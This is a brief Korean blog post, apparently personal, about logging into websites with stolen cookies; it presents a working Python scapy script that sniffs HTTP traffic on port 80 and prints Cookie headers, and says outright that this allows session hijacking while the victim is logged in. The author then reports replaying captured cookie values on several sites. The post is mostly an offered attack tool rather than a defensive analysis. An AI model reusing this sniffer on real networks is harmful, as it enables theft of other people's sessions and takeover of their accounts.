http://itlearner.tistory.com/293 와 http://itlearner.tistory.com/352 에서 포스팅했듯이 쿠키로도 로그인이 가능합니다.
아래는 쿠키정보를 빼내는 코드(화이트 해커를 위한 암호와 해킹 서적 참고)입니다.
이를 이용하면 세션 탈취가 가능합니다. 참고로 이러한 쿠키값 도용은 희생자가 로그인하고 있을 동안만 가능합니다.
from scapy.all import *
import re
def cookieSniffer(packet):
tcp = packet.getlayer('TCP')
cookie = re.search(r'Cookie: (.+)\\r\\n', str(tcp.payload))
if cookie:
print(cookie.group())
def main():
print('+++START SNIFFING COOKIE')
sniff(filter='tcp port 80', store=0, prn=cookieSniffer)
if __name__ == '__main__':
main()
또한, 찾아보니 쿠키값으로 로그인이 가능한 사이트가 몇 개 있었습니다.
그 외에도 쿠키값을 제외한 아이디와 패스워드만 암호화하는 사이트도 있었고,
쿠키값을 SET해도 로그인이 안되는 사이트가 있었습니다. 아마 별도의 로직이 있는 것 같습니다.